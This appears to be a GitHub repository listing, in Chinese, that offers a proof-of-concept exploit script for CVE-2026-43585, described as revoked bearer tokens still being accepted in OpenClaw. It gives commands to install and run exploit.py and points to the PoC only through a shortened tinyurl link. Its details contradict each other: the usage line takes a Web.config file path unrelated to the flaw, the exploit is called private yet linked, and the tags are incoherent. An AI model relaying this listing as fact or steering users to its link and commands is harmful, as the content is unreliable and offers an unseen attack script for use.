ByteWraith1/CVE-2026-43585
GitHub: ByteWraith1/CVE-2026-43585
针对 OpenClaw 凭证轮换后bearer token未正确失效漏洞(CVE-2026-43585)的PoC利用脚本。
Stars: 0 | Forks: 0
# CVE-2026-43585
### 概述
在 2026.4.15 版本之前,OpenClaw 未能在 SecretRef 轮换后正确处理 bearer token 身份验证。
### 前置条件
- Python 3.8+
- 库:requests、argparse(通过 `pip install -r requirements.txt` 安装)
### 使用说明
- 安装依赖:`pip install -r requirements.txt`
- 运行漏洞利用程序:`python exploit.py --target --file "/path/to/Web.config"`
详细信息
- CVE ID:CVE-2026-43585
- 发现时间:2026-04-15
- 发布时间:2026-05-6
- 漏洞利用可用性:未公开,仅限内部私有。
### 工作原理
这一疏忽允许攻击者利用未在网关处正确失效的已撤销 token,从而导致未授权访问。系统在启动期间捕获并保留了过时的 bearer-auth 配置,从而产生了一个安全弱点,可以通过 HTTP 和 WebSocket 处理程序利用该弱点执行未授权操作。
### 道德使用警告
- 此脚本是针对 CVE-2026-43585 的概念验证代码,仅用于教育和授权安全测试目的。
- **未经系统所有者明确许可,请勿在系统上使用此脚本。**
- 滥用可能违反法律,包括美国的《计算机欺诈和滥用法》(CFAA) 或其他地区的类似法律。
- 在测试任何系统之前,请务必获得书面授权。
### PoC 漏洞利用 - [链接](https://tinyurl.com/ydrjnkyp)
标签:Bearer Token, CISA项目, CVE-2026-43585, Modbus, OpenClaw, PoC, Python, SecretRef轮换, Web.config, WebSocket, 令牌窃取, 依赖分析, 安全测试, 攻击性安全, 数据展示, 无后门, 暴力破解, 未授权访问, 红队, 身份验证绕过, 逆向工具